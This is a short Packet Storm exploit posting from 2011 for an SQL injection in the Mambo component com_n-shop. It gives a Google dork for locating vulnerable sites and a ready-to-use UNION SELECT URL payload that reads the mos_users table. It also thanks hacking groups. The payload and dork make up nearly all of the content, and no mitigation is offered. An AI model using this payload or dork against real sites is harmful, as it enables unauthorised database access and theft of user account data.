Mambo N-Shop SQL Injection

2011-09-01T00:00:00
ID PACKETSTORM:104683
Type packetstorm
Reporter CoBRa_21
Modified 2011-09-01T00:00:00

Description

                                        
                                            `  
------------------------------------------------------------------------------------------------------  
# Exploit Title: Mambo Component com_n-shop SQL Injection Vulnerability  
# Google Dork: inurl:index.php?option=com_n-shop  
# Date: 01/09/2011  
# Author: CoBRa_21 (Penetration Tester)  
# E-Mail: ghost1lover@hotmail.com   
# Software Link: http://www.netvistun.is/  
# Tested on: FreeBSD 6.1 (remote host)  
------------------------------------------------------------------------------------------------------  
  
Exploit  
  
http://localhost/[PATH]/index.php?option=com_n-shop&do=add&id[]=370 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from mos_users  
  
------------------------------------------------------------------------------------------------------  
  
Thanks E-Banka.Org & Cyber-Warrior.Org  
  
------------------------------------------------------------------------------------------------------  
  
  
  
  
`